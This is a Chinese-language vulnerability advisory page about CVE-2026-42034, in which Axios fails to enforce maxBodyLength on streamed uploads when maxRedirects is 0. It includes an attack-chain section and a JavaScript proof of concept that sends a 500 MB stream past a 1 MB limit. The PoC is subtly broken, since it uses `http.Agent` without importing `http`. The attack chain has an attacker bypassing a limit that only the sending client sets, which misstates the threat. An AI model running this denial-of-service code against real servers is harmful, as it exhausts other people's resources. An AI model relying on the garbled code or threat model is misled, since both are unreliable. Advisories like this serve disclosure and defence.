IPBUF安全漏洞报告
English
CVE-2026-42034 CVSS 5.3 中危

CVE-2026-42034 Axios流式请求体长度限制绕过漏洞

披露日期: 2026-04-24
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-42034
漏洞类型
资源管理错误 (限制绕过)
CVSS评分
5.3 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Axios

相关标签

AxiosCVE-2026-42034限制绕过DoS资源耗尽Node.js

漏洞概述

Axios是一个流行的基于Promise的HTTP客户端。在1.15.1和0.31.1之前的版本中,存在一个安全限制绕过漏洞。当配置maxRedirects为0并使用原生http/https传输路径时,针对流式请求体的maxBodyLength限制会失效。这意味着即使调用者设置了严格的请求体大小限制,过大的流式上传仍会被完整发送。攻击者利用此漏洞可绕过安全限制,向服务器发送超大数据包,可能导致资源耗尽或拒绝服务。

技术细节

该漏洞源于Axios在处理流式请求体时的逻辑缺陷。通常,开发者使用`maxBodyLength`参数来限制请求体的大小,以防止资源耗尽攻击。然而,在受影响版本中,当`maxRedirects`被设置为0时,Axios会直接调用Node.js的原生`http`或`https`模块进行请求传输,绕过了其内部的封装层。在此特定路径下,针对流式数据的长度检查机制未被正确执行,导致`maxBodyLength`限制被完全绕过。攻击者可以通过构造恶意请求,向目标服务器发送远超预期的流式数据,从而消耗服务器内存和带宽,引发拒绝服务(DoS)。

攻击链分析

STEP 1
侦察阶段
攻击者识别目标应用使用了受影响版本的Axios库,且存在处理用户上传流式数据的接口。
STEP 2
漏洞利用
攻击者构造特制的HTTP POST请求,包含巨大的流式数据体,并在请求配置中将maxRedirects设置为0。
STEP 3
限制绕过
由于maxRedirects为0,Axios跳过内部封装直接使用原生传输,导致maxBodyLength检查失效,大数据包被发送至服务器。
STEP 4
影响达成
服务器接收并处理超大数据包,导致内存耗尽、带宽拥堵,最终引发服务拒绝(DoS)。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
const axios = require('axios'); const { Readable } = require('stream'); // Simulate a large data stream (e.g., 500MB) const largeStream = new Readable({ read() {} }); // Push a large amount of data to bypass the limit // In a real attack, this could be an infinite stream or huge file const largePayload = 'x'.repeat(1024 * 1024 * 500); largeStream.push(largePayload); largeStream.push(null); // Configure axios with a strict body limit but vulnerable redirect setting axios.post('http://localhost:3000/upload', largeStream, { maxBodyLength: 1024 * 1024, // Set limit to 1MB (Intended to block the request) maxRedirects: 0, // Set to 0 triggers the vulnerable path headers: { 'Content-Type': 'application/octet-stream' }, httpAgent: new http.Agent({ keepAlive: true }) }).then(response => { console.log('Request sent successfully (Limit Bypassed)', response.status); }).catch(error => { console.error('Request failed:', error.message); });

影响范围

Axios < 1.15.1
Axios < 0.31.1

防御指南

临时缓解措施
如果无法立即升级,建议在应用基础设施层面(如负载均衡器、反向代理或WAF)实施严格的请求体大小限制,确保恶意流量在到达应用逻辑之前被拦截。同时,避免在处理不可信流时依赖客户端库的长度限制作为唯一防御手段。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表